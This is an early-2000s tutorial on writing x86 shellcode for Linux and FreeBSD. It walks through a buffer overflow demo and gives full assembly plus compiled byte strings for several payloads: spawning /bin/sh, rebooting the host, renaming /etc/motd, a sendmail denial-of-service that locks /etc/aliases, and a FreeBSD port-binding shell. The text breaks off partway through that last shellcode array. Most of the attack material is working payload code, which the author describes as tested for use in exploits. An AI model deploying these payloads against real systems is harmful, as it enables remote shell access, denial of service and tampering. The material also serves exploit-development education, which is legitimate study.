Writing shellcode

Introduction:

Author: zillion (safemode.org)
Date: 10-04-2002

I wrote this document for the purpose of self-education and made it public
so that it might be useful to other. This is not the type of document 
from which you can expect to learn shellcode developement in 21 hours ;-) If 
you are completely new to this subject, try playing with assembly a bit and 
take it easy with this file.

The shellcodes presented here have all been tested to work can be used in most exploits without a problem. However, these codes may cause serious damage  to your computer and should therefor only be used against TEST systems that have  NO network connectivity!. Imagin what happens if you run the backdoor on you system  and forget about it....

If you have any comments or questions please feel free to them to mail me!

zillion

Processing assembly code:

I prefer using nasm to compile assembly code and the examples used in this
document are all written in the nasm syntax. Using nasm to compile the assembly
code can be done as follows:

nasm -o prog prog.S

After executing this command, the file 'prog' will contain our binary data
that we will translate to the shellcode.  At this point you will not be able
to execute this data directly from command line. You can use the utility that
is placed at the end of this document. Usage of this tool will look like this:

gcc -o s-proc s-proc.c 
bash-2.04$ ./s-proc -e prog
Calling code ...
sh-2.04$ exit
bash-2.04$ ./s-proc -p prog


char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"
        "\x42\x42\x42\x42";


bash-2.04$

Memory corruption:

Shellcode can be seen as a list of instructions that has been developed
in a manner that allows it to be injected in an application during runtime.

Injecting shellcode in application can be done trough many different security 
holes of which buffer overflows are the most popular ones. In order to explain
how shellcode is used, I will give a small buffer overflow example by using
the following c program:

void main(int argc, char **argv, char **envp) {

char array[200];
strcpy(array,argv[1]);

}

If we compile this (gcc -o overflow overflow.c) and execute it with a very
large string of characters we can overwrite memory:

On linux:

[root@droopy done]#  ./overflow `perl -e 'print "A" x 220'`BBBB
Segmentation fault (core dumped)
[root@droopy done]#

On FreeBSD:

[root@freebsd done]#  ./overflow `perl -e 'print "A" x 204'`BBBB
Segmentation fault (core dumped)
[root@freebsd done]#

Well that doesn't look good now does it ? ;-) It appears that we forced some
memory corruption with the 220 A's and 4 B's that where given to the program
as argument during the execution. That argument exceeded the size of the array 
and as a result of this, data that was stored behind this array got overwritten. 
You can see what happend by using gdb (the GNU debugger) to analyze the core 
dump file. Output generated by gdb often looks very scary for newcommers but 
have no fear.. there is a manual.

BTW if you did not get a coredump try more A's or set ulimit to a number
such as 99999 ( ulimit -c 99999 )

[root@droopy done]# gdb -core=core 
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) info all
eax            0xbffff990       -1073743472
ecx            0xfffffdc3       -573
edx            0xbffffcad       -1073742675
ebx            0x4013b824       1075034148
esp            0xbffffa70       0xbffffa70
ebp            0x41414141       0x41414141
esi            0xbffffad4       -1073743148
edi            0x0      0
eip            0x42424242       0x42424242
eflags         0x10286  66182
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
st0            0        (raw 0x00000000000000000000)
st1            0        (raw 0x00000000000000000000)
st2            0        (raw 0x00000000000000000000)
st3            0        (raw 0x00000000000000000000)
st4            0        (raw 0x00000000000000000000)
st5            0        (raw 0x00000000000000000000)
st6            0        (raw 0x00000000000000000000)
st7            0        (raw 0x00000000000000000000)
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0

So by using GDB we can see the contents of all registers at the time 'overflow'
got killed. I have made the most important registers bold. EBP and EIP are 32 bit
registers (32/8 = 4 Byte) and are holding the last 8 bytes of our argument.

In the above gdb output you can see that lines 'EBP' and 'EIP' are made bold.
These are important lines from which we can indicate that memory was overwritten
with data we control. As you can see EBP holds the value 0x41414141. 41 is the 
hex value for A meaning that EBP contains AAAA. The EIP register holds 0x42424242.
42 is the hex value of B meaning that EIP holds BBBB.

You can also use gdb to examine more memory by using the 'x' command. In this case 
we can see our buffer by using the command 'x/150 0xbffffa70' where 0xbffffa70 is 
the value that is obtained from the ESP register:

 (gdb) x/150 $esp
0xbffffa70:     0x00000000      0xbffffad4      0xbffffae0      0x0804830e
0xbffffa80:     0x080482e4      0x4013b824      0xbffffaa8      0x40037b4c
0xbffffa90:     0x00000000      0xbffffae0      0x4013a358      0x40016638
0xbffffaa0:     0x00000002      0x08048380      0x00000000      0x080483a1
0xbffffab0:     0x0804845c      0x00000002      0xbffffad4      0x080482e4
0xbffffac0:     0x080484cc      0x4000df24      0xbffffacc      0x40016c0c
0xbffffad0:     0x00000002      0xbffffbc1      0xbffffbcc      0x00000000
0xbffffae0:     0xbffffcad      0xbffffcce      0xbffffced      0xbffffd0f
0xbffffaf0:     0xbffffd1b      0xbffffede      0xbffffefd      0xbfffff13
0xbffffb00:     0xbfffff1e      0xbfffff2d      0xbfffff35      0xbfffff45
0xbffffb10:     0xbfffff53      0xbfffff64      0xbfffff6f      0xbfffff80
0xbffffb20:     0xbfffffa3      0xbfffffb6      0xbfffffc3      0x00000000
0xbffffb30:     0x00000003      0x08048034      0x00000004      0x00000020
0xbffffb40:     0x00000005      0x00000006      0x00000006      0x00001000
0xbffffb50:     0x00000007      0x40000000      0x00000008      0x00000000
0xbffffb60:     0x00000009      0x08048380      0x0000000b      0x00000000
0xbffffb70:     0x0000000c      0x00000000      0x0000000d      0x00000000
0xbffffb80:     0x0000000e      0x00000000      0x00000010      0x0080f9ff
0xbffffb90:     0x0000000f      0xbffffbbc      0x00000000      0x00000000
0xbffffba0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb0:     0x00000000      0x00000000      0x00000000      0x36383669
0xbffffbc0:     0x6f2f2e00      0x66726576      0x00776f6c      0x41414141
0xbffffbd0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffbe0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffbf0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc00:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc10:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc20:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc30:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc40:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc50:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc60:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc70:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc80:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffc90:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffca0:     0x41414141      0x41414141      0x42424242      0x44575000
0xbffffcb0:     0x6f682f3d      0x6e2f656d      0x736c6569      0x6f7a2f68
0xbffffcc0:     0x722f656e      0x79646165
(gdb)

Here we can see that EBP and EIP are located directly behind eachother. Now
what most exploit do is that they put an address in EIP (Instruction pointer)
that points to instructions they have put in the buffer that caused the
overflow. Instructions ?? hey that includes our shellcode !! ;-)

Using the registers:

Intel has 32 bit registers that can be split up in 16 and 8 bit. When developing
shellcode you will find out that using the smallest registers often prevents
having NULL bytes in code. Also using the right register for the right value
should be considered effective programming. I mean would you put a mouse in a
cage that was created for an elephant ?? I tought so ! ;p . Now lets have a look
at the registers that we will be using.


32 Bit	16 Bit	8 Bit (High)	8 Bit (Low)
EAX	AX	AH	AL
EBX	BX	BH	BL
ECX	CX	CH	CL
EDX	DX	DH	DL

EAX, AX, AH and AL are called the 'Accumulator' registers and can be used for I/O 
port access, arithmetic, interrupt calls etc. Later in this document you will see 
that we can use these registers to use system calls.

EBX, BX, BH, and BL are the 'Base' registers and are used as base pointers for 
memory access. You will see later on that we will use this register to store 
pointers in for arguments of system calls. This register is also sometimes used
to store return value from an interrupt in. An example of this can be seen when
using the 'open' systems call. When you opened a file with this system call then
the 'file' descriptor, which can be used for I/O with the opened file, will be 
stored in the EBX register.

ECX, CX, CH, and CL are also known as the 'Counter' registers. In the examples
of this document you will see a loop that uses CL as a counter and some examples
that will use ECX to store pointers in.

EDX, DX, DH, and DL are called the 'Data' registers and can be used for I/O port
access , arithmetic and some intrerrupt calls.

When you want to execute a system call you will have to use these registers to 
prepare the system call. A very simple example is the exit(0) syscall:

mov           al, 0x01  ; The syscall number for exit
xor           ebx, ebx  ; EBX will now contain the value 0
int           0x80      ; and activate ! 

It is important to always use the smallest registers available to store you data
in. This to avoid NULL bytes in shell code. For example if we would use the following
exit code:

BITS 32
                         ; exit(0) code
mov           eax, 0x01  ; The syscall number for exit
xor           ebx, ebx   ; EBX will now contain the value 0
int           0x80       ; and activate !

The register 'eax' will be to large to hold our byte with the result that NULL bytes 
will exist in our shellcode result:

su-2.05a# s-proc -p exit

char shellcode[] =
        "\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80";


By using 'ndisasm' , which is part of the nasm package, we can see how the large register
is translated:

su-2.05a# ndisasm exit
00000000  B80100            mov ax,0x1
00000003  0000              add [bx+si],al 
00000005  31DB              xor bx,bx
00000007  CD80              int 0x80

The addressing problem:

In most cases of shellcode you cannot use hardcoded memory addresses. So in 
order to know where your data is located, you'll need to do a little trick:

jmp short       stuff   
code:
pop             esi

<data>

stuff:
call              code 
db              'This is my string#'     

What you see in the above code is that we 'jmp' from the beginning of the 
code to 'stuff' from where we 'call code'. At the beginning from 'code' we 
'pop esi'. Now esi will represent the location of the string 'This is my string' 
 

In the above sample [esi + 1] represents 'h' from the word 'This'.

The NULL byte problem:

NULL bytes are string delimeters and kill shellcode. If you created shellcode
that contains such bytes: Don't bother using it and try to fix the problem.
So since you cannot have NULL bytes in the shellcode you will have to add them
at runtime. Now that we have seen in the above example how to get the location
of bytes in our string:

jmp short       stuff  
code:

pop             esi
xor             eax,eax         ; doing this will make eax NULL 
mov byte        [esi + 17],al   ; put a null byte byte on [esi + 17]  

stuff:
call            code
db              'This is my string#'
 
In the above example we replace '#' with a NULL byte and terminate the string 
'This is my string' at run time. For clean coding purposes it I find it the best
to alter you strings at the beginning of you assembly code.

Please note that NULL bytes are not the only problem! Other bytes such as newlines
and special characters can also cause problems !.

The syn() syn() reboot() examples :

Dont run this code on a production system ! Sync brings the hard disk state 
of the file system in sync with the internal state of the file system. We have
to put this in front of the reboot() syscall to avoid loss of data that hasn't
been written by the harddisk on the file system. Using this code can ofcourse
still result in dataloss because active processes are *not* terminated properly 
before the reboot. Since we don't need to alter any data in this code, their is
no need to find out from what location we are working:

BITS 32

pop             esi
xor             eax, eax
mov             al,36 
int             0x80
mov             al,36
int             0x80
mov             al, 88
mov             ebx, 0xfee1dead 
mov             ecx, 672274793
mov             edx, 0x1234567
int             0x80

Shellcode produced by this assembly code:

[root@droopy doc]# nasm -o reboot reboot.S 
[root@droopy doc]# s-proc -p reboot


char shellcode[] =
        "\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\xb0\x58\xbb\xad"
        "\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

The FreeBSD code for this is much simpler and doesn't require you to add sync()
in front of it:

BITS 32

xor             eax,eax
mov             dx,9998   
sub             dx,9990
mov             al, 55
int             0x80

The FreeBSD shellcode created by this code:

char shellcode[] =
        "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";

Additionally FreeBSD also has many more different flags for reboots which you can
use to do some funky stuff ;-) see:  /usr/include/sys/reboot.h for more information.

The rename() example (linux):

The rename syscall looks like this (taken from 'man rename'): 

int rename(const char *oldpath, const char *newpath);

So in order to use this syscall successful we need two pointers to our old 
and new file. To get an adress from a string we can use 'lea' in assembly. 

BITS 32

jmp short       callit

doit:   
pop             esi
xor             eax, eax
mov byte        [esi + 9], al     ; terminate arg 1 
mov byte        [esi + 24], al    ; terminate arg 2 
mov byte        al, 38            ; the syscall rename = 83 
lea             ebx, [esi]        ; put the address of /etc/motd (esi) in ebx
lea             ecx, [esi + 10]   ; put the address of /etc/ooops.txt (esi + 10) in ecx 
int             0x80              ; We have everything ready so lets call the kernel    
                                 
mov             al, 0x01          ; prepare to exit()
xor             ebx, ebx          ; clean up    
int             0x80              ; and exit !  

callit:
call            doit
db              '/etc/motd#/etc/ooops.txt#'

Please note that the 'db' line can also be formatted like this, it doesn't make any difference:

db              '/etc/motd#'
db              '/etc/ooops.txt#'

Shellcode produced from this assembly code, after we compiled it, will look like this:

char shellcode[] =
        "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x88\x46\x18\xb0\x26\x8d\x1e"
        "\x8d\x4e\x0a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe3\xff\xff"
        "\xff\x2f\x65\x74\x63\x2f\x6d\x6f\x74\x64\x23\x2f\x65\x74\x63"
        "\x2f\x6f\x6f\x6f\x70\x73\x2e\x74\x78\x74\x23";

The execve examples number I (no arguments):

Execve is the almighty system call that can be used to execute a file. The 
linux implementation looks like this:

int execve (const char *filename, char *const argv [], char *const envp[]);

So what we need is to get 3 pointers, one to our filename, one to the arguments
array and one to environment array. Since we are not interested in the environment
array we will use NULL for it. We will implement this execve as follows:

execve("pointer to string /bin/sh","pointer to /bin/sh","pointer to NULL");

BITS 32

jmp short       callit            ; jmp trick as explained above

doit:

pop             esi               ; esi now represents the location of our string
xor             eax, eax          ; make eax 0
mov byte        [esi + 7], al     ; terminate /bin/sh 
lea             ebx, [esi]        ; get the adress of /bin/sh and put it in register ebx 
mov long        [esi + 8], ebx    ; put the value of ebx (the address of /bin/sh) in AAAA ([esi +8]) 
mov long        [esi + 12], eax   ; put NULL in BBBB (remember xor eax, eax) 
mov byte        al, 0x0b          ; Execution time! we use syscall 0x0b which represents execve
mov             ebx, esi          ; argument one... ratatata /bin/sh
lea             ecx, [esi + 8]    ; argument two... ratatata our pointer to /bin/sh
lea             edx, [esi + 12]   ; argument three... ratataa our pointer to NULL
int             0x80

callit:
call            doit              ; part of the jmp trick to get the location of db

db              '/bin/sh#AAAABBBB'

Note that the #AAAABBBB characters are not needed in the shellcode but removing them can have the result
that the the shellcode corrupts memory which causes it to fail. This assembly code can be used to create 
the following shellcode:

char shellcode[] =
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"
        "\x42\x42\x42\x42";

In the above example syscall argument data is stored in the CPU registers (eax,ecx,edx etc). 
This is the way how Linux likes it. On *BSD systems argument are given to system calls by pushing 
them on the stack. Below is an example for an execve syscall on FreeBSD:

BITS 32

jmp short       callit
doit:

pop             esi
xor             eax, eax
mov byte        [esi + 7], al
push            eax
push            eax
push            esi 
mov             al,59
push            eax 
int             0x80

callit:
call            doit

db              '/bin/sh'

And the result:

su-2.05a# s-proc -p execve


char shellcode[] =
        "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
        "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";


su-2.05a# s-proc -e execve
Calling code ...
#

The execve example number II (one argument, linux):

From the execve man page:

int execve (const char *filename, char *const argv [], char *const envp[]);

So we need a pointer to our file name, argument array and environment array. The
last called array may also be replaced with NULL and that is what we will do ;-)
Remember.. you can use execve for any program ! 
   
BITS 32

jmp short       callit

doit:

                                 ; Part one: Manipulate the string defined after 'db'
pop             esi              ; esi now represents our string
xor             eax, eax    ;  
mov byte        [esi + 7], al    ; put null byte after /bin/sh and ths terminate the string 
mov byte        [esi + 10], al   ; ditto but then after -i

                                 ; Part two: Prepare the arguments for our system call 
mov long        [esi + 11], esi  ; get address of /bin/sh and store it in AAAA 
lea             ebx, [esi + 8]   ; get adress of -i and store it in ebp 
mov long        [esi + 15], ebx  ; store the address in [esi + 15] -> BBBBB
mov long        [esi + 19], eax  ; put NULL in CCCC 

                                 ; Part three: Prepare execution and execute
mov byte        al, 0x0b         ; 0x0b is the execve system call
mov             ebx, esi         ; ebx = argument 1
lea             ecx, [esi + 11]  ; arguments pointer
lea             edx, [esi + 19]  ; environment pointer
int             0x80

mov             al, 0x01
xor             ebx, ebx
int             0x80

callit:
call            doit

db              '/bin/sh#-i#AAAABBBBCCCC'


[root@droopy execve-2]# nasm -o execve execve.S 
[root@droopy execve-2]# s-proc -p execve


char shellcode[] =
        "\xeb\x27\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
        "\x8d\x56\x13\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
        "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x69\x23\x41\x41\x41"
        "\x41\x42\x42\x42\x42\x43\x43\x43\x43";


[root@droopy execve-2]# s-proc -e execve
Calling code ...
sh-2.04#

The execve example number III (2 > arguments, linux):

Again we will use the following defenition:

int execve (const char *filename, char *const argv [], char *const envp[]);

And our goal is as follows:

int execve (AAAA,pointer to array AAAABBBBCCCC,DDDD);

BITS 32

jmp short       callit

doit:   

pop             esi
xor             eax, eax
mov byte        [esi + 7], al     ; terminate /bin/sh
mov byte        [esi + 10], al    ; terminate -c
mov byte        [esi + 18], al    ; terminate /bin/ls
mov long        [esi + 20], esi   ; address of /bin/sh in AAAA
lea             ebx, [esi + 8]    ; get address of -c  
mov long        [esi + 24], ebx   ; store address of -c in BBBB 
lea             ebx, [esi + 11]   ; get address of /bin/ls
mov long        [esi + 28], ebx   ; store address of /bin/ls in CCCC
mov long        [esi + 32], eax   ; put NULL in DDDD
mov byte        al, 0x0b          ; prepare the execution, we use syscall 0x0b (execve)
mov             ebx, esi          ; program 
lea             ecx, [esi + 20]   ; argument array (/bin/sh -c /bin/ls) 
lea             edx, [esi + 32]   ; NULL
int             0x80              ; call the kernel to look at our stuff ;-)

callit:
call            doit

db              '/bin/sh#-c#/bin/ls#AAAABBBBCCCCDDDD'

[root@droopy execve-3]# s-proc -p execve


char shellcode[] =
        "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x12\x89"
        "\x76\x14\x8d\x5e\x08\x89\x5e\x18\x8d\x5e\x0b\x89\x5e\x1c\x89"
        "\x46\x20\xb0\x0b\x89\xf3\x8d\x4e\x14\x8d\x56\x20\xcd\x80\xe8"
        "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
        "\x2f\x62\x69\x6e\x2f\x6c\x73\x23\x41\x41\x41\x41\x42\x42\x42"
        "\x42\x43\x43\x43\x43\x44\x44\x44\x44";

[root@droopy execve-3]# s-proc -e execve
Calling code ...
execve  execve.S
[root@droopy execve-3]#

The open() write() close() and exit() example (linux):

BITS 32

jmp short       callit

doit:   

pop             esi
xor             eax, eax
mov byte        [esi + 14], al   ; terminate /tmp/hacked.txt
mov byte        [esi + 29],0xa   ; 0xa == newline
mov byte        [esi + 30], al   ; terminate niels was here 
lea             ebx, [esi + 15]  ; get address
mov long        [esi + 31], ebx  ; put the address of niels--here in xxxx
mov             al, 5            ; the syscall open() = 5 
lea             ebx, [esi]       ; argument #1   
mov             cx, 1090         ; 1024 (append) + 64 (create if no exist) + 2 rw
mov             dx, 744q         ; if we need to create, these are the permissions
int             0x80             ; kernel int

mov long        ebx,eax          ; get the descriptor
mov             al, 4 
mov             ecx,[esi + 31]   ; the location of our data
mov             dx, 15           ; the size of our data
int             0x80             ; kernel interrupt

mov             al, 6            ; the close syscall = 6
int             0x80             ; clozzzz      

mov             al, 0x01         ; exit system call
xor             ebx, ebx         ; clean up
int             0x80             ; and bail out 


callit:
call            doit

db              '/tmp/owned.txt#'
db              'niels was here #xxxx'


Now this code will generate the following shellcode:

sh-2.04$ ../../../process open shellcode
Calling code ...
bash-2.05$ cat shellcode 
char shellcode[] = 
        "\xeb\x38\x5e\x31\xc0\x88\x46\x0e\xc6\x46\x1d\x0a\x88\x46\x1e"
        "\x8d\x5e\x0f\x89\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66"
        "\xba\xe4\x01\xcd\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0f"
        "\x00\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3"
        "\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e\x74"
        "\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68\x65"
        "\x72\x65\x20\x23\x78\x78\x78\x78";

bash-2.05$ 

As you can see there is a NULL byte in it and thus this shellcode cannot be used So lets find out
what the problem is by using ndisasm.

bash-2.04$ ndisasm open     
00000000  EB38              jmp short 0x3a
00000002  5E                pop si
00000003  31C0              xor ax,ax
00000005  88460E            mov [bp+0xe],al
00000008  C6461D0A          mov byte [bp+0x1d],0xa
0000000C  88461E            mov [bp+0x1e],al
0000000F  8D5E0F            lea bx,[bp+0xf]
00000012  895E1F            mov [bp+0x1f],bx
00000015  B005              mov al,0x5
00000017  8D1E66B9          lea bx,[0xb966]
0000001B  42                inc dx
0000001C  0466              add al,0x66
0000001E  BAE401            mov dx,0x1e4
00000021  CD80              int 0x80
00000023  89C3              mov bx,ax
00000025  B004              mov al,0x4
00000027  8B4E1F            mov cx,[bp+0x1f]
0000002A  66BA0F00CD80      mov edx,0x80cd000f     <-- beh !
00000030  B006              mov al,0x6
00000032  CD80              int 0x80
00000034  B001              mov al,0x1
00000036  31DB              xor bx,bx
00000038  CD80              int 0x80
0000003A  E8C3FF            call 0x0
0000003D  FF                db 0xFF
0000003E  FF2F              jmp far [bx]
00000040  746D              jz 0xaf
00000042  702F              jo 0x73
00000044  6F                outsw
00000045  776E              ja 0xb5
00000047  65642E7478        cs jz 0xc4
0000004C  7423              jz 0x71
0000004E  6E                outsb
0000004F  69656C7320        imul sp,[di+0x6c],0x2073
00000054  7761              ja 0xb7
00000056  7320              jnc 0x78
00000058  686572            push word 0x7265
0000005B  652023            and [gs:bp+di],ah
0000005E  7878              js 0xd8
00000060  7878              js 0xda


As you might have already seen that the number of bytes we want 
to write is causing a problem. That means the following line needs a fix: 

mov             dx, 15          

We can fix that by using the following trick:

mov             dx,9995           ; A trick to get 15 in dx without getting null bytes
sub             dx,9980

So what we do is we store 9995 in dx and substract 9980 from it. As a result
dx will contain 15, which is exactly the amount of bytes we want to write in
the opened file. After correcting this error we get the following shellcode:
 
char shellcode[] =
        "\xeb\x39\x5e\x31\xc0\x88\x46\x0e\x88\x46\x1e\x8d\x5e\x0f\x89"
        "\x5e\x1f\xb0\x05\x8d\x1e\x66\xb9\x42\x04\x66\xba\xe4\x01\xcd"
        "\x80\x89\xc3\xb0\x04\x8b\x4e\x1f\x66\xba\x0b\x27\x66\x81\xea"
        "\xfc\x26\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8"
        "\xc2\xff\xff\xff\x2f\x74\x6d\x70\x2f\x6f\x77\x6e\x65\x64\x2e"
        "\x74\x78\x74\x23\x6e\x69\x65\x6c\x73\x20\x77\x61\x73\x20\x68"
        "\x65\x72\x65\x20\x23\x78\x78\x78\x78";

And gone is the null byte ! ;-)

Linux sendmail harrasing shellcode:

This shellcode abused a weakness in sendmail that can prevent that application
from being able to work properly. More information about that issue can be found
here: http://www.sendmail.org/LockingAdvisory.txt


BITS 32

jmp short       callit

doit:

pop             esi
xor             ebx,ebx        ; Make sure the registers we use
xor             eax,eax        ; are clean
mov             eax,0x2        ; 0x2 is fork(). This function returns
int             0x80           ; A process ID to the parent and a 0 to the
                               ; child process. We can test on this and let
test            eax,eax        ; the parent process exit. This is an important
jnz             exit           ; test which can be crucial with forking bind
                               ; shellcode. (man fork)
xor             eax,eax
mov             [esi + 12],al  ; Terminate /etc/aliases
mov             ecx,eax        ; ecx = 0
mov             ebx,esi        ; The ebx register will contain the
mov             al,5           ; location of our data which is 'esi'
int             0x80           ; we open() the file and safe the returned
xor             ebx,ebx        ; file descriptor in ebx after cleaning this
mov             ebx,eax        ; register with xor.
mov             cl,0x2         ; We want an exclusively lock
mov             al,143         ; flock()
int             0x80           ; call kernel and make the lock a fact

sub             cl,0x3         ; Start a infinite loop to make sure
l00p:                          ; that sendmail cannot access the file
js              l00p

callit:
call            doit

db              '/etc/aliases'

exit:                          ; Exit will get called in the parent process
xor             eax,eax        ; This is not really needed I guess you can just 
mov             al,1           ; let it crash to safe space ;-)
int             0x80           ; Execute !! ;-))

The FreeBSD port binding shellcode example:

While port binding shellcode looks very complex, it isn't really that hard to write it.
It very much like the above example, several system calls on a row from which some are 
using information that was returned from another (I introduced this in the above example). 
When writing a bit more complex code it can help if you first write it in c. In our case 
just ripped the c source of the port binding shellcode that Taeho Oh wrote for his shellcode 
document and made some minor changes to it. The assembly code generated from this c source is 
ofcourse hombrewn and works like a charm on FreeBSD.

#include<unistd.h>
#include<sys/socket.h>
#include<netinet/in.h>

int soc,cli;
struct sockaddr_in serv_addr;

int main()
{
      if(fork()==0)
        {


                serv_addr.sin_family=2;
                serv_addr.sin_addr.s_addr=0;
                serv_addr.sin_port=0xAAAA;
                soc=socket(2,1,6);
                bind(soc,(struct sockaddr *)&serv_addr,0x10);
                listen(soc,1);
                cli=accept(soc,0,0);
                dup2(cli,0);
                dup2(cli,1);
                dup2(cli,2);
                execve("/bin/sh",0,0);
        }
}

The assembly code I generated from this C source:

BITS 32

jmp short      callit
doit:

pop             esi
xor             eax, eax
mov byte        [esi + 7], al         ; Terminate the /bin/sh string
mov             al,2                  ; The fork() system call
int             0x80                  ; We call the kernel to fork us. 
                                      ;
                                      ; Next code: socket(2,1,6)                                
push byte       0x06                  ; The 3e argument   
push byte       0x01                  ; The 2e argument 
push byte       0x02                  ; The 1e argument 
mov             al,97                 ; The system call number
push            eax                   ;
int             0x80                  ; And call the kernel  
                                      ; 
                                      ; Next code: bind(soc,(struct sockaddr *)&serv_addr,0x10);
mov             edx,eax               ; We store the file descriptor that was returned from socket() in edx
xor             eax,eax               ; Now we will create the sockaddr_in structure
mov byte        [esi + 9],0x02        ; This equals: serv_addr.sin_family=2
mov word        [esi + 10],0xAAAA     ; This equals: serv_addr.sin_port=0xAAAA
mov long        [esi + 12],eax        ; This equals: serv_addr.sin_addr.s_addr=0
push byte       0x10                  ; We now start with pushing the arguments, 0x10 is the 3e one.   
lea             eax,[esi + 8]         ; Get the address of our structure, arg 2 of bind() is a pointer.
push            eax                   ; And push it on the stack, our second argument is a fact
push            edx                   ; And we push the last argument, the file descriptor, on the stack
xor             eax,eax               ; Clean up
mov             al,104                ; System call 104 represents bind.
push            eax                   ;
int             0x80                  ; And call the kernel
                                      ;      
                                      ; Next code: listen(soc,1); 
push byte       0x1                   ; We push the first argument on the stack 
push            edx                   ; We push the filedescriptor that is still stored in the edx register
xor             eax,eax               ; Cleanup
mov             al,106                ; System call 106 represents listen
push            eax                   ;
int             0x80                  ; And call the kernel   
                                      ;
                                      ; Next code: accept(soc,0,0);
xor             eax,eax               ; We need zero's for the arguments.
push            eax                   ; Push the last argument, a zero 
push            eax                   ; Push the second argument, another zero 
push            edx                   ; Push the first argument, the file descriptor of our socket
mov             al,30                 ; Define the system call we like to use, accept()
push            eax                   ;                      
int             0x80                  ; And call the kernel to process our data 
                                      ;    
                                      ; Next code: dup2(cli,0) , dup2(cli,1) and dup2(cli,2) 
                                      ; We will do this in a loop since this creates smaller code.
mov             cl,3                  ; Define our counter = 3 
mov             ebx,-1                ; The C code for our loop is: b = -1; for(int i =3;i>0;i--) { dup(cli,++b) }; 
mov             edx,eax               ; We store the file descriptor from accept() in edx.
                                      ;  
l00p:                                 ; The loop code starts here.      
inc             ebx                   ; This is the instead of the ++b code 
push            ebx                   ; We push this value first because it represents the last argument 
push            edx                   ; We push the second argument, the file descriptor from accept() 
mov             al,90                 ; We define the system call
push            eax                   ;  
int             0x80                  ; And call the kernel to execute  
sub             cl, 1                 ; Substract 1 from cl
jnz l00p                              ; This will continue the loop if cl != 0   
                                      ;  
                                      ; Next the execve of /bin/sh
xor             eax,eax               ; First we create some zero's
push            eax                   ; The 3e argument == NULL
push            eax                   ; So is the second 
push            esi                   ; The first argument is a pointer to our string /bin/sh 
mov             al,59                 ; We define the system call, execve.
push            eax                   ; 
int             0x80                  ; And execute  


callit:
call            doit

db              '/bin/sh'

And again the most important part, the result:

char shellcode[] =
        "\xeb\x6a\x5e\x31\xc0\x31\xdb\x88\x46\x07\xb0\x02\xcd\x80\x6a"
        "\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6"
        "\x46\x09\x02\x66\xc7\x46\x0a\xaa\xaa\x89\x46\x0c\x6a\x10\x8d"
        "\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31"
        "\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd"
        "\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a"
